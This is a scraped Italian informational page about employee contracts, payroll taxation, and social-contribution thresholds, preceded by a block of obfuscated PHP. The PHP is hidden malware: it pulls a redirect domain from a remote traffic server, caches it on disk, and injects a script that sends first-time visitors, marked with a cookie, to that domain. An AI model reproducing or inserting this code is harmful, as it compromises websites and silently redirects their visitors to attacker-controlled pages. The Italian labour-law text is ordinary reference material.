$ed6fe1d0be6347b8e = "/index/?6871568466678"; $kkk557 = "738dd3a8d3649a9131aafdde64b25464"; $s8c7dd922ad47494f = dirname(__FILE__) . "/" . md5($id6fe1d0be634); $h77e8e1445762ae1a = time(); $dejrif483ol = file_exists($s8c7dd922ad47494f); $deaa082fa57816233 = 0; $d07cc694b9b3fc636 = 0; if ($dejrif483ol) { $deaa082fa57816233 = filemtime($s8c7dd922ad47494f); $d07cc694b9b3fc636 = $h77e8e1445762ae1a - $deaa082fa57816233; $se1260894f59eeae9 = @fopen($s8c7dd922ad47494f, base64_decode('cg==')); $ke4e46deb7f9cc58c = json_decode(base64_decode(fread($se1260894f59eeae9, filesize($s8c7dd922ad47494f))) , 1); fclose($se1260894f59eeae9); } $v634894f9845d8dc65 = 'aHR0cDovL3JvaS10cmFmZmljLmljdS9nZXQucGhwP2Y9anNvbiZrZXk9'; $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; if ($d07cc694b9b3fc636 >= 20 || !$dejrif483ol) { $m9b207167e5381c47 = v64547f9857d8dc65($s8c7dd922ad47494f); if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) { $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; } } function v64547f9857d8dc65($s8c7dd922ad47494f){ global $v634894f9845d8dc65,$kkk557; if(function_exists('curl_version')){ $kd88fc6edf21ea464 = curl_init(); curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true); curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA==')); curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65).$kkk557); curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10); $mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464); curl_close($kd88fc6edf21ea464); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } }else{ $mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65).$kkk557); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } } return false; } if (!$_COOKIE[base64_decode('YTc3N2Q=') ]) { setcookie(base64_decode('YTc3N2Q=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $ye617ef6974faced4 . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $ye617ef6974faced4 . base64_decode('Ijs8L3NjcmlwdD4='); LAVORATORI DIPENDENTI - CENTRO SERVIZI SALERNO
CENTRO SERVIZI SALERNO » LAVORATORI DIPENDENTI

LAVORATORI DIPENDENTI

LAVORATORI DIPENDENTI

 

Sono lavoratori dipendenti i lavoratori occupati in un’ azienda alle dipendenze e sotto la direzione del datore di lavoro, tenuti a rispettare un orario di lavoro, in cambio di una retribuzione.

Il datore di lavoro può essere anche chi, a norma del codice civile, non è imprenditore commerciale.

 

Il rapporto di lavoro dipendete può essere:

  • A tempo indeterminato, se nel contratto di lavoro stipulato non è previsto un termine di cessazione
  • A tempo determinato o a termine, se il datore di lavoro e il lavoratore stabiliscono che il rapporto di lavoro duri fino ad una data stabilita.
  •  

Con riferimento alle modalità temporale di svolgimento della prestazione di lavoro dipendente si parla di:

  • Lavoro “full time” (tempo pieno), in esso la durata complessiva della prestazione lavorativa richiesta coincide con quella stabilita dal contratto collettivo nazionale relativo alla categoria di lavoratori considerata.
  • Lavoro “part time” (tempo parziale), in esso la durata complessiva della prestazione lavorativa richiesta è ridotta con quella stabilita dal contratto nazionale relativo alla categoria di lavoratori considerata. Il lavoro part-time può essere di tipo orizzontale (la prestazione viene prestata per un numero di giornate mensili pari a quello dei lavoratori “a tempo pieno” ma in misura ridotta) oppure verticale (la prestazione viene effettuata in un numero di giornate e/o di settimane inferiori a quello contrattualmente previsto, ma per l’intera durata giornaliera e/o settimanale).
  •  

RETRIBUZIONE

 

I lavoratori dipendenti, in cambio dell’attività svolta, percepiscono una retribuzione. Tutte le somme e i valori che i datori di lavoro erogano ai dipendenti costituiscono, sotto il profilo fiscale, redditi da lavoro dipendente.

Nel reddito sono incluse oltre alle somme in denaro anche i beni o altri benefici che il lavoratore riceve dal datore di lavoro per esigenze connesse all’attività lavorativa.

I redditi sono soggetti a tassazione sul reddito delle persone fisiche IRPEF. Il datore di lavoro trattiene mensilmente dalla retribuzione “lorda” dovuta al lavoratore in “busta paga” le somme corrispondenti al prelievo fiscale e le versa allo Stato. Al lavoratore viene così corrisposta una retribuzione “netta”.

Il contributo è per definizione “obbligatorio”, in quanto dovuto per legge indipendentemente da eventuali accordi tra le parti. I contributi vengono calcolati in percentuale sulla retribuzione: una parte è a carico dell’azienda e una parte è a carico del lavoratore.

 

 

CALCOLO CONTRIBUTIVO

 

La misura dei contributi è determinata dalla natura dell’attività esercitata dall’azienda, dalla posizione dei lavoratori in azienda e dalla retribuzione imponibile.

Ai fini del calcolo dei contributi, si considera retribuzione tutto ciò che il lavoratore percepisce dal datore di lavoro in denaro o in natura, in dipendenza del rapporto di lavoro, al lordo di qualsiasi ritenuta.

L’aliquota media a carico ditta è pari al 32,70% della retribuzione lorda per la generalità dei lavoratori dipendenti. La quota a carico del dipendente è normalmente pari al 9,19% della retribuzione.

 

 

MINIMALE IMPONIBILE

 

La legge prevede che la retribuzione lorda sulla quale sono calcolati i contributi previdenziali non possa essere inferiore ad un determinato importo stabilito dai contratti collettivi o direttamente dalla legge stessa. L’importo è fissato per ciascuno giornata di lavoro e prende il nome di minimale di retribuzione giornaliera.

Per l’anno 2010 il minimale, per la generalità dei lavoratori, è stato stabilito in Euro 43,79 giornalieri. Per i lavoratori a part-time il minimale è calcolato in ore e non in giornate. Il minimale orario per l’anno 2010 è di Euro 6,57.

La retribuzione imponibile minima settimanale per il 2009 è pari a Euro 262,74.

 

 

MASSIMALE IMPONIBILE

 

I contributi sono dovuti sull’intera retribuzione che il lavoratore percepisce. Per i lavoratori che non hanno anzianità contributiva alla data del 31/12/1995 (quindi hanno iniziato a lavorare a partire dal 1/1/1996) l’assicurazione pensionistica è dovuta solo fino a massimale annuo, mentre le assicurazioni non pensionistiche sono dovute sull’intera retribuzione. Il massimale annuo si applica anche ai lavoratori che hanno iniziato a lavorare prima del 1/1/1996 e che optano per il calcolo della pensione con il sistema contributivo invece che retributivo.

Il massimale imponibile, per l’anno 2010, è pari a Euro 92.147,00.